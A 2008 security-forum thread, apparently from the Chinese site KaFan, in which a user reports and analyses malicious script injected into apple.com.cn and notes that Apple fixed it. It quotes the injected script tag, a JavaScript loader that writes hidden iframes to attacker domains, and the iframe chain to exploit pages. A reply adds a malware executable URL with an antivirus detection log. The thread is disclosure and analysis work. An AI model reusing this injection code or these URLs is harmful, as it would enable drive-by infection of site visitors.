查看: 7936|回复: 23
收起左侧

[已鉴定] 真爽,apple中国官方站挂马。[官方已修复]

 关闭 [复制链接]
ALEXBLAIR
发表于 2008-3-14 01:02:40 | 显示全部楼层 |阅读模式
难道是让大家都用mac  os么?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
看看今天的主角~
http://www.apple.com.cn
未命名.JPG
出问题的脚本位于head部分
  1. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
  2. "http://www.w3.org/TR/html4/loose.dtd">

  3. <script src=http://1.hao929.cn/999.js></script>

  4. <!---equiv="content-type" content="text/html;
  5. charset=gb2312">
复制代码
被加载的js的关键语句是:
  1. document.writeln("<\/SCRIPT>");
  2. document.writeln("<iframe src=http:\/\/c.j8j8.biz\/107\/ width=50 height=0><\/iframe> ");
  3. document.writeln("<iframe src=http:\/\/1.hao929.cn\/999.htm width=50 height=0><\/iframe> ");
复制代码
顺便找出其他的东西
  1. http://c.j8j8.biz/107/
  2. http://1.hao929.cn/999.htm
复制代码
继续分析
  1. http://c.j8j8.biz/107/
复制代码
的内容为
  1. <html><TITLE>index</TITLE><BODY>
  2. <iframe src="" width=100 height=1></iframe>
  3. <iframe src="r.htm" width=100 height=1></iframe>
  4. <iframe src="1.htm" width=100 height=1></iframe>
  5. </body></html>
  6. <script src='http://s109.cnzz.com/stat.php?id=418410&web_id=418410' language='JavaScript' charset='gb2312'></script>
复制代码
很恶俗的出现了
1.htm
r.htm
这两个东西太长了,打包在附件里,是两个漏洞利用脚本。

刚才的
  1. http://1.hao929.cn/999.htm
复制代码
也一样是漏洞利用脚本

继续分析下去就交给大家了。

这年头apple都不安全了~~

已经通知了管理员,估计不久就可以修复了(发出的邮件快照)
未命名23.JPG


39分钟后,网站被修复了~~~速度不错~比以前的太平洋不知道快了多少倍。现在已经正常了。
未命名.JPG

[ 本帖最后由 ALEXBLAIR 于 2008-3-14 01:42 编辑 ]

1.zip

715 Bytes, 下载次数: 175

107.zip

296 Bytes, 下载次数: 158

999.htm.zip

442 Bytes, 下载次数: 177

999.js.zip

332 Bytes, 下载次数: 187

r.zip

2.5 KB, 下载次数: 194

www.apple.com.cn.zip

5.79 KB, 下载次数: 167

插入木马脚本后的html.zip

6.79 KB, 下载次数: 178

jimmyleo
发表于 2008-3-14 01:16:44 | 显示全部楼层
我只知道那个广告歌 很嚣张


123.PNG
ALEXBLAIR
 楼主| 发表于 2008-3-14 01:28:48 | 显示全部楼层

回复 2楼 jimmyleo 的帖子

阿米又出现了~~~
抱走~~
ALEXBLAIR
 楼主| 发表于 2008-3-14 01:33:11 | 显示全部楼层
苹果的反应真快,已经被修复了~~~
jimmyleo
发表于 2008-3-14 01:36:23 | 显示全部楼层
还让人家看你的真爽的感叹...

对了 你那个邮件终端用的是什么? OE?
QQ777888
发表于 2008-3-14 01:36:42 | 显示全部楼层
没有吧,我刚去了还想来这里发帖呢,没想到已经有了
ALEXBLAIR
 楼主| 发表于 2008-3-14 01:39:05 | 显示全部楼层
原帖由 jimmyleo 于 2008-3-14 01:36 发表
还让人家看你的真爽的感叹...

对了 你那个邮件终端用的是什么? OE?

那是当然,apple需要灵感,我能创造灵感~~~
邮件客户端是outlook~~
jimmyleo
发表于 2008-3-14 01:47:37 | 显示全部楼层
outlook被我封存到现在...

是时候考虑 选个 客户端了... 唉 不用多好..

linkscanner真好...

明天晚上可能会写篇文章 附带个小工具
ALEXBLAIR
 楼主| 发表于 2008-3-14 01:50:27 | 显示全部楼层
原帖由 jimmyleo 于 2008-3-14 01:47 发表
outlook被我封存到现在...

是时候考虑 选个 客户端了... 唉 不用多好..

linkscanner真好...

明天晚上可能会写篇文章 附带个小工具


outlook的确是不错的东西,配合office系列使用很稳定和可靠,而且,支持的服务多,通用性广还可以和google的日历互通~~很爽的东西 ,不过自带的OE就和垃圾没什么两样了


阿米要发布个小工具了?

紧紧抱住阿米,然后~~~

[ 本帖最后由 ALEXBLAIR 于 2008-3-14 01:52 编辑 ]
mofunzone
发表于 2008-3-14 01:53:21 | 显示全部楼层
http://vvv.123sky.biz/107/107.exe
这个
Starting the file scan:

Begin scan in 'C:\TDDOWNLOAD\107.exe'
C:\TDDOWNLOAD\
  107.exe
    [0] Archive type: Runtime Packed
    --> Object
        [DETECTION] Contains detection pattern of the worm WORM/Cekar.A
      [NOTE]      The file was deleted!
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-15 01:45 , Processed in 0.131352 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表